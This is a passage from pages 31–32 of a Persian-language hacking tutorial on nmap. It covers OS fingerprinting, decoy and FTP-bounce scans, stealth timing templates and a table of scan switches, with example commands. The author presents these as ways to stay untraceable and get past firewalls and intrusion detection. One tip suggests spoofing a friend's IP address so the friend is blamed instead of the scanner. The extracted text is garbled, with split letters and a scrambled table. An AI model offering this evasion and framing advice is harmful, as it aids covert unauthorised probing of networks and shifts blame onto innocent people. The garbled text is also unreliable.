ﺎﻧﯽ ﻣ ﺜﻼ ﺏ ﺎ دریﺎﻓ ﺖ ۴ﺏ ﺴﺘﻪ در ﺟ ﻮاب ﭼﻬ ﺎر ﺏ ﺴﺘﻪ ﻣﻴﻔﺮﺱﺘﺪ اﻣﺎ ﻓﻘﻂ یﮑﯽ از ان ﺏﺴﺘﻪ هﺎ ﺁدرس ﻣﺎﺷﻴﻦ ﭘﻮیﺸﮕﺮ ﭘﻮرت را دارد و ﺏﻘﻴﻪ ﺁدرﺱﻬﺎی ﺏﻴﮕﻨﺎﻩ و ﺏﻴﺨﺒﺮ هﺴﺘﻨﺪ ﮐ ﻪ ﺏﻌ ﺪ از دریﺎﻓ ﺖ ای ﻦ ﺏ ﺴﺘﻪ ﺁن
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣١
را ﺡﺬف ﻣﻴﮑﻨﺪ .ﺧﻮب اﮔﺮ ﺷﻤﺎ ﺏﻪ ﺟﺎی ۴ﺏﺴﺘﻪ ٣٠ﺏﺴﺘﻪ ﺏﻔﺮﺱﺘﻴﺪ ﭼﻪ ﻣﻴﺸﻮد هﻴﭽﯽ ﻓﻘ ﻂ ﮐ ﺎر ﻣ ﺴﻠﻮل اﻣﻨﻴ ﺖ ﺱ ﺎیﺖ ٣٠ﺏﺮاﺏ ﺮ ﻣﻴ ﺸﻮد و ﻋﻤ ﻼ ﺷ ﻤﺎ ﻏﻴﺮ ﻗﺎﺏﻞ رد یﺎﺏﯽ ﻣﻴﺸﻮیﺪ. یﮑﯽ از ﻗﺎﺏﻠﻴﺘﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﻮیﺶ هﻢ زﻣﺎن ﭼﻨﺪ ﻗﺮﺏﺎﻧﯽ اﺱﺖ ﮐﻪ ﺏﻌﺪا ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ . یﮑﯽ دیﮕﺮ از ویﮋﮔﯽ هﺎی nmapﮐﻪ ﺁن را از دیﮕﺮ ﻧﺮم اﻓﺰار هﺎی ﻣﺸﺎﺏﻪ ﺧﻮد ﻣﺘﻤﺎیﺰ ﻣﯽ ﮐﻨﺪ ﺕﺸﺨﻴﺺ ﻧ ﻮع ﺱﻴ ﺴﺘﻢ ﻋﺎﻣ ﻞ اﺱ ﺖ اﻟﺒﺘ ﻪ راﻩ ه ﺎی زیﺎدی هﻤﭽﻮن pingو ﺕﻮﺟﻪ ﺏﻪ ﭘﺎراﻣﺘﺮ TTLاﺱﺖ .اﻟﺒﺘﻪ nmapاز ایﻦ روش اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﺪ .روش ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮای ﺕﺸﺨﻴﺺ OSﺏﺮ ﻣﺒﻨ ﺎی ﻧﻘﺾ اﺻﻮل ﭘﺮوﺕﮑﻞ اﺱﺖ ﻣﺜﻼ هﺮ ﮔﺎﻩ یﮏ دﻓﻌﻪ ی ﮏ ﺏ ﺴﺘﻪ ACKﺏ ﻪ ﺱ ﻮی ویﻨ ﺪوز ﺡﻮاﻟ ﻪ ﺷ ﻮد ) هﻤ ﺎﻧﻄﻮر ﮐ ﻪ ﻣ ﯽ داﻧﻴ ﺪ ه ﻴﭻ وﻗ ﺖ ی ﮏ ﺏ ﺴﺘﻪ ACKیﮏ دﻓﻌﻪ ﺡﻮاﻟﻪ هﻴﭻ ﻣﺎﺷﻴﻨﯽ ﻧﻤﯽ ﺷﻮد ( در ﺟﻮاب یﮏ ﺏﺴﺘﻪ RESETﺏ ﺮ ﻣ ﯽ ﮔ ﺮدد .ﺏ ﺴﺘﻪ ه ﺎیﯽ ﮐ ﻪ ای ﻦ ﻧ ﺮم اﻓ ﺰار ﻣﻴﻔﺮﺱ ﺘﺪ ی ﮏ دﻓﻌ ﻪ ﻋﺒﺎرﺕﻨ ﺪ از SYSو ) NULLﺏ ﺴﺘﻪ NULLﺏ ﺴﺘﻪ ای ﺏ ﺪون CODE BITاﺱ ﺖ ( و ACKو ) SYNﺏ ﻪ ﺱ ﻮی ﭘ ﻮرت ه ﺎ ﺏ ﺴﺘﻪ ﻣﻴﻔﺮﺱ ﺘﺪ( و ACKو UDPو ) PSHو URGو FINﺏﺴﻮی ﭘﻮرت هﺎی ﺏﺴﺘﻪ ( و PSHو URGو … ﺧﻮب nmapیﮏ ،دو ﺟﻴﻦ از ﺟﻮاب هﺎی دریﺎﻓﺘﯽ هﺮ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را دارد و ﺏﺎ دریﺎﻓﺖ ﺟﻮاب ﭘﯽ ﺏﻪ ﻧﻮع OSﻣﯽ ﺏﺮد. ﮐﺪ ﻣﻨﺒﻊ ﺏﺮای ﻧﺴﺨﻪ ویﻨﺪوز ﻧﺮم اﻓﺰار Win nmapرا ﻣﻴﺘﻮاﻧﻴﺪ از ﺁدرس زیﺮ ﺏﺪﺱﺖ ﺏﯽ ﺁوریﺪ : http://nmapwin.sourceforge.com/projects/nmapwin اﻟﺒﺘﻪ یﮏ ﮐﻤﯽ ﻓﮑﺮ ﮐﻨﻢ اﻧﮕﻮﻟﮏ ﮐﻨﻴﺪ ﺁن را ،ﺕﻮ ویﻨﺪوز XPﺏﺎ ﺱﺮویﺲ ﭘﮏ هﻢ ﮐﺎر ﮐﻨﺪ وﻟﯽ ﻣﻦ ﮐﺮدم ﻧﺼﻒ ﻗﺎﺏﻠﻴﺖ هﺎی ﺁن ﭘﺮی ﺪ !!! دارم روش ﮐﺎر ﻣﻴﮑﻨﻢ !!!!! از nmapﻣﻴﺸﻮد ﺏﺮای اﺕﺼﺎل ﺏﻪ یﮏ ﭘﻮرت اﺱﺘﻔﺎدﻩ ﮐﺮد ﺏﺎ ﺷﮑﻞ ﻋﻤﻮﻣﯽ زیﺮ : >Nmap –PT <port_number ﺧﻮب از ایﻦ دﺱﺘﻮر nmapدر ﻣﻮاﻗﻌﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ ﮐﻪ ﻣﺜﻼ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ اﻣﮑﺎﻧﺎت ﺁن یﮏ رﻧﺞ IPرا ﺏﺮای ﺏﺎﻻ ﺏﻮدن ﻣﺎﺷ ﻴﻦ ه ﺎ ﮔ ﺸﺘﻪ ام وﻟ ﯽ ﺏ ﻪ ﺟﻮاﺏﻬﺎ ﺧﻴﻠﯽ ﺷﮏ دارم ﺁن هﺎیﯽ را ﮐﻪ اﺡﺘﻤﺎل ﻣﯽ دهﻢ ،در ﺧﻮاﺱﺖ ﻣﻦ دیﻮار ﺁﺕﺶ ﺱﻮزاﻧﺪﻩ ﺏﺎ ایﻦ دﺱ ﺘﻮر ﭼ ﮏ ﻣﻴﮑ ﻨﻢ و ﻣﻌﻤ ﻮﻻ از ﭘ ﻮرت ٨٠ هﻢ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ. یﮏ ﻧﻤﻮﻧﻪ از دﺱﺘﻮر nmapﺏﺎ ﻣﮑﺎﻧﻴﺰم FTP Bounceرا در زیﺮ ﺁوردﻩ ام ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ : Nmap –b [email protected]_host.com –p 6000 xxx.xxx.xxx.xxx ﻓﺮﻣﺎن ﺏﺎﻻ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ﺱﺮور ftp.lame_host.comﭘ ﻮرت ۶٠٠٠از ﻣﻴﺰﺏ ﺎﻧﯽ ﺏ ﻪ ﺁدرس xxx.xxx.xxx.xxxرا ﺟﻬ ﺖ ﭘ ﯽ ﺏﺮدن ﺏﻪ ایﻦ ﻣﻄﻠﺐ ﮐﻪ ﺁیﺎ ﻣﻴﺰﺏﺎن ﻣﺬﮐﻮر در ﺡﺎل اﺟﺮای ﺱﺮویﺲ ) Xهﻤﺎن X Windowsﻟﻴﻨﻮﮐﺲ (اﺱﺖ یﺎ ﺧﻴﺮ . ﺏﻌﺪ یﮏ ﺱﺮی ﮐﺎرهﺎ ﺧﻮد ﺏﺮﻧﺎﻣﻪ اﻧﺠﺎم ﻣﻴﺪهﺪ .ﺏﻌﺪ ﺟﻮاب را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ. ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮای زﻣﺎن ﺏﻨﺪی ﻋﻤﻞ ﭘﻮیﺶ ﭘﻮرت اﻣﮑﺎﻧﺎت ﺧﻮﺏﯽ را در اﺧﺘﻴﺎر ﻣﺎ ﻗﺮار ﻣﯽ دهﺪ ﮐﻪ اﻟﺒﺘﻪ ﺏﻴ ﺸﺘﺮ در ﺕﻤ ﺎم ﻣﻘ ﺎﻻﺕﯽ و ﺁﻣﻮزﺷ ﻬﺎ ﮐ ﻪ در ﺏﺎرﻩ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻧﻮﺷﺘﻪ ﺷﺪﻩ اﺱﺖ در ﺡ ﻖ ای ﻦ ﮔﺰیﻨ ﻪ ﻣ ﺎﻓﻮق ﻣﻬ ﻢ اﺟﺤ ﺎف ﺷ ﺪﻩ اﺱ ﺖ زی ﺮا ﺏﻴ ﺸﺘﺮ دی ﻮار ﺁﺕ ﺶ ه ﺎ ﮐ ﻪ ﻗﻴﻤ ﺖ ﻣﺘﻮﺱ ﻄﯽ دارﻧ ﺪ و ﻧ ﺮم اﻓﺰاری هﺴﺘﻨﺪ هﻤﻪ از اﻟﮕﻮی زﻣﺎن ﺏﻨﺪی ﺕﻬﺎﺟﻢ را ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ از ﺟﻤﻠﻪ ﻣﺤﺼﻮﻻت semanticو MacAfeeو... ﮐﻪ ﮐﺎر ایﻦ اﻟﮕﻮ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ اﻧﻮاع اﺱ ﮑﻦ ﻏﻴ ﺮ ﻣﺨﻔ ﯽ ﺷ ﻤﺎ دود ﺏ ﺸﻮد و ﺏ ﺮود ه ﻮا و در ﺏﻌ ﻀﯽ ﻣﻮاﻗ ﻊ ه ﻢ ﻣ ﺪهﺎی ﻣﺨﻔ ﯽ ﺁن از ﺟﻤﻠ ﻪ FTP Bounceﭼﻮن ﺷﻤﺎ داریﺪ ﭘﺸﺖ ﺱﺮ هﻢ ﺏﻪ ﻃﺮف ﺏﺴﺘﻪ ﻣﻴﺪهﻴﺪ . ﺡﺎل ﮐﻪ اهﻤﻴﺖ ایﻦ ﻣﻮﺽﻮع ﭘﯽ ﺏﺮدیﺪ در ﺟﺪول زیﺮ اﻟﮕﻮهﺎی زﻣﺎن ﺏﻨﺪی ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ در ﺏﺮﻧﺎﻣﻪ Nmapرا ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ: ﻧﺎم اﻟﮕﻮ
ﻓﻮاﺻﻞ زﻣﺎﻧﯽ
زﻣﺎن ﺻﺮف ﺷﺪﻩ ﺏﺮای اﺱﮑﻦ هﺮ ﻣﻴﺰﺏﺎن
Paranoid Sneaky Polite
۵دﻗﻴﻘﻪ ١۵ﺙﺎﻧﻴﻪ ۴ﺙﺎﻧﻴﻪ
ﻧﺎﻣﺤﺪود ﻧﺎﻣﺤﺪود ﻧﺎﻣﺤﺪود
Normal
-
ﻧﺎﻣﺤﺪود
Aggressive
-
۵دﻗﻴﻘﻪ
Insane اﻟﮕﻮی ﺕﻌﺮیﻔﯽ ﺕﻮﺱﻂ ﮐﺎرﺏﺮ
Scan_delay
٧۵ﺙﺎﻧﻴﻪ Host_timeout
زﻣﺎن ﻣﺠﺎز ﺏﺮای دریﺎﻓﺖ ﭘﺎﺱﺦ ﻣﻮرد ﻧﻈﺮ از ﻣﻴﺰﺏﺎن ۵دﻗﻴﻘﻪ ١۵ﺙﺎﻧﻴﻪ ۶ﺙﺎﻧﻴﻪ )ﺡﺪاﮐﺜﺮ ١٠ ﺙﺎﻧﻴﻪ ( ۶ﺙﺎﻧﻴﻪ )ﺡﺪاﮐﺜﺮ ١٠ ﺙﺎﻧﻴﻪ ( یﮏ ﺙﺎﻧﻴﻪ ) ﺡﺪاﮐﺜﺮ ۵٫١ ﺙﺎﻧﻴﻪ ( ﺡﺪاﮐﺜﺮ ٣ﺙﺎﻧﻴﻪ Initial_rtt_timeout Min_rtt_timeout Max_rrt_timeout
ﭘﻮیﺶ ﻣﻮازی ) اﺱﮑﻦ هﻢ زﻣﺎن ﭼﻨﺪ ﻣﻴﺰﺏﺎن ( ﺧﻴﺮ ﺧﻴﺮ ﺧﻴﺮ ﺧﻴﺮ ﺏﻠﻪ ﺏﻠﻪ Max_parallelism
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٣٢
ﺕﻤﺎم اﻟﮕﻮهﺎی ﭘﻴﺶ ﺕﻌﺮیﻒ ﺷﺪﻩ را ﻣﻴﺘﻮان ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ از ﮔﺰیﻨ ﻪ –Tدر اﺧﺘﻴ ﺎر ﮔﺮﻓ ﺖ .ﺏ ﺮای ﻧﻤﻮﻧ ﻪ ﺏ ﻪ ﻓﺮﻣ ﺎن زی ﺮ ﺕﻮﺟ ﻪ ﮐﻨﻴ ﺪ ﮐ ﻪ اﻟﮕ ﻮی ﮐﻠ ﯽ را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ : Nmap T Sneaky sS xxx.xxx.xxx.xxx p 1-100 ﺧﻮب sSﮐﻪ ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ اﺱﺖ T ،زﻣﺎن ﺏﻨﺪی را ﻓﻌﺎل ﻣﯽ ﮐﻨﺪ Sneakyهﻢ ﻣﺪل را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ . ﺧﻮب ﺷﻤﺎ ﺧﻮدﺕﺎن هﻢ ﻣﯽ ﺕﻮاﻧﻴﺪ یﮏ ﻣﺪل ﺕﻌﺮیﻒ ﮐﻨﻴﺪ ﮐﻪ Scan_delayﺡﺪاﻗﻞ ﻓﺎﺻﻠﻪ زﻣﺎﻧﯽ ﻣ ﻮرد ﻧﻴ ﺎز ﺏ ﺮ ﺡ ﺴﺐ ﻣﻴﻠ ﯽ ﺙﺎﻧﻴ ﻪ ﺏ ﻪ ﻋﻨ ﻮان ﺕ ﺎﺧﻴﺮ ﻣﻴﺎن اﺱﮑﻦ دو ﻣﻴﺰﺏﺎن ﻣﺨﺘﻠﻒ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ .ﮔﺰیﻨﻪ Host_timeoutﺡﺪاﮐﺜﺮ زﻣﺎن ﻗﺎﺏﻞ ﺻﺮف ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ را ﺟﻬ ﺖ اﺱ ﮑﻦ ﭘ ﻮرت هﺎی یﮏ ﻣﻴﺰﺏﺎن ﺧﺎص ﺕﻌﻴﻴﻦ ﻣﻴﮑﻨﺪ .ﺱﻪ ﮔﺰیﻨﻪ rtt_timeoutﻣﺪت زﻣﺎن اﻧﺘﻈ ﺎر ﺏ ﺮ ﺡ ﺴﺐ ﻣﻴﻠ ﯽ ﺙﺎﻧﻴ ﻪ را ﺟﻬ ﺖ دریﺎﻓ ﺖ ﭘﺎﺱ ﺦ ﻻزم از ﻣﻴﺰﺏ ﺎن ﻣﻮرد ﻧﻈﺮ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻨﺪ.اﻟﺒﺘﻪ ﮐﻤﺘﺮیﻦ زﻣﺎن در ﺏﺮﻧﺎﻣﻪ nmapﺏﺮای دریﺎﻓﺖ ﭘﺎﺱﺦ ٣٠٠ﻣﻴﻠ ﯽ ﺙﺎﻧﻴ ﻪ اﺱ ﺖ .ﮔﺰیﻨ ﻪ ﺁﺧ ﺮ Max_parallelism ﺕﻌﺪاد ﭘﻮرت هﺎیﯽ را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ ﮐﻪ ﺏﻪ ﻃﻮر ﻣﻮازی ) یﺎ هﻢ زﻣﺎن ﺏﻪ ﻋﺒﺎرت دیﮕﺮ ( ﻣﻴﺘﻮان ﭘﻮیﺶ ﻧﻤ ﻮد .اﻟﺒﺘ ﻪ اﮔ ﺮ ﻣﻘ ﺪار ١را ﺏ ﻪ ﺁن ﺏﺪهﻴ ﺪ ﮐﻼ ایﻦ ویﮋﮔﯽ را ﻏﻴﺮ ﻓﻌﺎل ﮐﺮدﻩ ایﺪ اﻟﺒﺘﻪ ﻇﺮﻓﻴﺖ ایﻦ ﻣﻘﺪار ﺡﺪاﮐﺜﺮ ٣۶اﺱﺖ. ﻟﻴﺴﺖ ﺱﻮیﭻ هﺎ ﻋﺒﺎرت اﻧﺪ از :
١ ٢ ٣
-sT -sS -sF
۴
-sP
Ping Sweep
۵
-sU
UDP Scan
۶
-sN
Null Scan
٧
-sX
Xams Tree
٨
-sO
IP Scan
٩
-sI
Idle Scan
١٠
-sA
ACK Scan
ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ اﺱﺖ ﺏﺎﻻ زیﺎد ﺕﻮﺽﻴﺢ دادم !! ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ اﺱﺖ. ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ TCP FINارﺱﺎل ﻣﻴﺸﻮد .اﮔﺮ RESETﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ یﮏ ﻣﺎﺷﻴﻦ در ﺷﺒﮑﻪ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﭘﻴﻐﺎم . ICMP ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ UDPارﺱﺎل ﻣﻴﺸﻮد .اﮔﺮ RESETیﺎ ﭘﻴﻐﺎم ICMPﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ، در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ارﺱﺎل ﻣﯽ ﺷﻮد ﮐﻪ در ﺁن هﻴﭻ یﮏ از ﺏﻴﺘﻬﺎی ﮐﻨﺘﺮﻟﯽ ) ﻣﺜﻞ ACKو FINو ( ... ﻓﻌﺎل ﻧﻴﺴﺖ .اﮔﺮ RESETﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ، در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ TCPﺏﺎ ﺏﻴﺘﻬﺎی ﻓﻌﺎل FINو URGو PUSHارﺱﺎل ﻣﻴﺸﻮد .اﮔﺮ RESET ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ﺏﺮای اﺱﮑﻦ ﭘﺮوﺕﮑﻞ اﺱﺖ.یﻌﻨﯽ ایﻨﮑﻪ ﺏﺒﻴﻨﻴﻢ ﺁیﺎ ﭘﺮوﺕﮑﻞ ﻣﻮرد ﻧﻈﺮ روی ﻣﺎﺷﻴﻦ هﺪف هﺴﺖ یﺎ ﮐﻪ ﺧﻴﺮ .ﻣﺜﻼ ﺏﺎ ارﺱﺎل یﮏ ﺏﺴﺘﻪ IPﺧﺎم ) هﺪر ﻣﺪر ﻧﺪارد ﺧﺎﻟﯽ اﺱﺖ ایﻦ ﻓﻴﻠﺪ (ﺏﺎ ﺷﻨﺎﺱﻪ ١٣٠ﻣﻴﺘﻮاﻧﻴﻢ ﺏﺒﻴﻨﻴﻢ ﺁیﺎ ﭘﺮوﺕﮑﻞ SPS ) (Secure Packet Shieldﺁیﺎ روی ﻣﺎﺷﻴﻦ هﺴﺖ یﺎ ﻧﻪ .اﮔﺮ در ﺟﻮاب یﮏ ﺏﺴﺘﻪ ICMPﺏﺎ ﻣﺤﺘﻮای protocol unreachableﺏﮕﻴﺮیﻢ ﻣﻴﺸﻮد ﮔﻔﺖ ایﻦ ﭘﺮوﺕﮑﻞ روی ﻣﺎﺷﻴﻦ هﺪف ﻧﺼﺐ ﻧﺸﺪﻩ اﺱﺖ .اﮔﺮ ﺟﻮاب ﺏﻪ ﻣﺎ ﻧﺪهﺪ ﻣﻴﺸﻮد ﮔﻔﺖ ﮐﻪ ایﻦ ﭘﺮوﺕﮑﻞ روی ﻣﺎﺷﻴﻦ هﺴﺖ .ایﻦ را ذﮐﺮ ﮐﻨﻢ ﮐﻪ ایﻦ ﺷﻴﻮﻩ ،ﺷﻴﻮﻩ ﮐﺎر درﺱﺘﯽ اﺱﺖ!! ﺏﺮای اﺱﮑﻦ ﻣﻴﺰﺏﺎن هﺎیﯽ اﺱﺖ ﮐﻪ از ﺱﺮویﺲ Identd ﮐﻪ ﺏﻪ ﺻﻮرت ﺏﻴﺶ ﻓﺮض روی ﭘﻮرت ١١٣ﻓﺎل ﮔﻮش ﻣﯽ ﻣﺎﻧﻨﺪ اﺱﺖ اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ از ﺟﻤﻠﻪ ﻟﻴﺴﺖ ﮐﺎرﺏﺮان و ..را ﺏﺪﺱﺖ ﻣﯽ ﺁورد. ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ TCP ACKارﺱﺎل ﻣﯽ ﺷﻮد. اﮔﺮ RESETﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ،در ﻏﻴﺮ ایﻦ
ﻗﺴﻤﺖ Scanﺏﺨﺶ Modeیﺎ Type
ﺱﻮیﭻ
ﻧﺎم ﺱﻮیﭻ در NMapWin Connect SYS Stealth FIN Stealth
ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ هﺎ
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
١٢
-sR
RCP Scan
١٣
-sL
List Scan
١۴
}-p {x-x
Port Range
١۵
}-D {x-x
Use Decoy
١۶
}-b {x-x
Bounce Scan
١٧
}-e {x
Device
١٨
}-S {x
Source Address
ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ . ﻧﻮع ﻣﺨﺼﻮﺻﯽ از ﻣﮑﺎﻧﻴﺰم ﺏﺮای ویﻨﺪوز اﺱﺖ ﮐﻪ در ایﻦ ﻣﮑﺎﻧﻴﺰم ﻣﺸﺎﺏﻪ SYS ACKاﺱﺖ ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ ﻓﻴﻠﺪ Window Sizeدر ﺏﺴﺘﻪ TCPاﺱﺘﻔﺎدﻩ ﺷﺪﻩ اﺱﺖ. ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ ﺱﺮویﺲ RPCدر ﺷﺒﮑﻪ ).ایﻦ ﻣﮑﺎﻧﻴﺰم } ﺧﻮدش از ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ { ﮐﻠﻴﻪ ﭘﻮرت هﺎی ﺏﺎز و ﺁﻣﺎدﻩ اﺱﺘﻔﺎدﻩ از ﺱﺮویﺲ RPC ﮐﻪ اﺻﻄﻼﺡﺎ port mapperرا ﺏﻌﻼوﻩ اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ ﺁﺷﮑﺎر ﻣﻴﮑﻨﺪ ( ﺧﻮب ایﻦ ﮔﺰیﻨﻪ را ﻣﻦ زیﺎد اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﻢ وﻟﯽ ﻓﮑﺮ ﻣﻴﮑﻨﻢ هﻤﺎن ﻋﻤﻞ Pingرا اﻧﺠﺎم ﻣﻴﺪهﺪ ﺏﺎ اﻣﻨﻴﺖ ﺏﻴﺸﺘﺮ. ﺏﺎ ایﻦ ﮔﺰیﻨﻪ ﻟﻴﺴﺖ ﭘﻮرت هﺎی را ﮐﻪ ﺏﺎیﺪ اﺱﮑﻦ ﮐﻨﺪ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻴﻢ ﺏﻪ ایﻦ ﺻﻮرت ﮐﻪ ﺧﻮب در ﺏﺎرﻩ ایﻦ ﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم ﮐﻪ یﮑﯽ از ﻣﮑﺎﻧﻴﺰﻣﻬﺎی ﻣﺨﻔﯽ ﻣﺎﻧﺪن اﺱﺖ ﮐﻪ راﺏﻄﻪ ﻣﺴﺘﻘﻴﻤﯽ ﺏﺎ ﭘﻬﻨﺎی ﺏﺎﻧﺪ ارﺕﺒﺎﻃﯽ ﺷﻤﺎ دارد .ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ ﻣﮑﺎﻧﻴﺰم ﺷﻤﺎ یﮏ ﺱﺮی ) IPﺕﺮﺟﻴﺤﺎ ( Clintﭘﻴﺪا ﮐﺮدﻩ ) ﺏﻪ ﻣﻘﺪار ﻻزم ﻧﺴﺒﺖ ﺏﻪ ﺷﮑﻢ ﺧﻮدﺕﺎن !!!( و ﺏﻌﺪ از ﺱﻮیﭻ در ﻗﺎﻟﺐ ﻟﻴﺴﺘﯽ ﮐﻪ اﻗﻼم ﺏﻪ وﺱﻴﻠﻪ یﮏ ﻋﻼﻣﺖ ﻣﺒﺎرﮐﻪ ﮐﺎﻣﺎ از یﮑﺪیﮕﺮ ﺟﺪا ﺷﺪﻩ اﻧﺪ ذﮐﺮ ﻣﯽ ﮐﻨﻴﺪ. ﺧﻮب درﺏﺎرﻩ ایﻦ ﮐﻪ ﺧﻴﻠﯽ ﺏﺎﻻ ﺕﻮﺽﻴﺢ دادم هﻤﺎن ﻣﮑﺎﻧﻴﺰم ﻣﺨﻔﯽ ﻣﺎﻧﺪن FTP Bounceاﺱﺖ ﮐﻪ ﺏﻌﺪ از ﺱﻮیﭻ IPیﺎ IPهﺎ را وارد ﻣﯽ ﮐﻨﻴﺪ. در ﻣﻮرد ﻣﻴﺰﺏﺎﻧﻬﺎی ﮐﻪ ﺏﻴﺶ از یﮏ راﺏﻂ ﺷﺒﮑﻪ را ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار دادﻩ اﻧﺪ ،اﻣﮑﺎن ﺕﻌﻴﻴﻦ راﺏﻂ ﺷﺒﮑﻪ ﻣﻮرد ﻧﻈﺮ را ﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﻣﻴﺰﺏﺎن در اﺧﺘﻴﺎر ﻣﯽ ﮔﺰارد .اﻟﺒﺘﻪ ﺕﻌﻴﻴﻦ راﺏﻂ ﺷﺒﮑﻪ ﻣﻮرد ﻧﻈﺮ ﺏﻌﺪ از ﺱﻮیﭻ اﻟﺰاﻣﯽ اﺱﺖ. ایﻦ ﺱﻮیﭻ ﺏﻪ ﺷﻤﺎ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﺁدرس IPﻣﻨﺒﻊ ارﺱﺎل ﮐﻨﻨﺪﻩ ﺏﺴﺘﻪ هﺎ را ﻣﺸﺨﺺ ﮐﻨﻴﺪ .ﺷﻤﺎ ﺏﺎ ایﻦ ﺷﻴﻮﻩ ﻣﻴﺘﻮاﻧﻴﺪ ﻣﺜﻼ IPیﮑﯽ از دوﺱﺘﺎن ﺧﻮد !!! را درج ﮐﻨﻴﺪ ﮐﻪ اﮔﺮ یﮏ دﻓﻌﻪ اﻓﺴﺮ اوﻣﺪ ) (IDSﺁن ﺏﺪ ﺏﺨﺖ ﺧﻔﺖ ﮐﻨﺪ ﻧﻪ ﺷﻤﺎ را ) ﻋﺠﺐ ﮐﺎر ﮐﺜﻴﻒ و ﭘﻠﻴﺪی (.اﻧﺸﺎاﷲ ﺧﺪا ﻣﻦ ﺏﺒﺨﺸﺪ ﺏﻪ ﺧﺎﻃﺮ ﺁﻣﻮزش دادن ایﻦ ﭼﻴﺰهﺎ ﺏﻪ ﻣﻠﺖ. ایﻦ اﺽﺎﻓﻪ ﮐﻨﻢ ایﻦ ﺷﻴﻮﻩ در ﻣﻮرد ﻣﻴﺰﺏﺎن هﺎیﯽ ﮐﻪ ﭼﻨﺪ اﺕﺼﺎل ﺷﺒﮑﻪ دارﻧﺪ زیﺎد ﮐﺎرایﯽ ﻧﺪارد ﭼﺮا ﺁن را ﺧﻮدﺕﺎن ﮐﺸﻒ ﮐﻨﻴﺪ اﻧﺸﺎاﷲ " ﻓﻴﻞ ،ﺱﻮف " ﺏﺸﻮیﺪ .ایﻦ 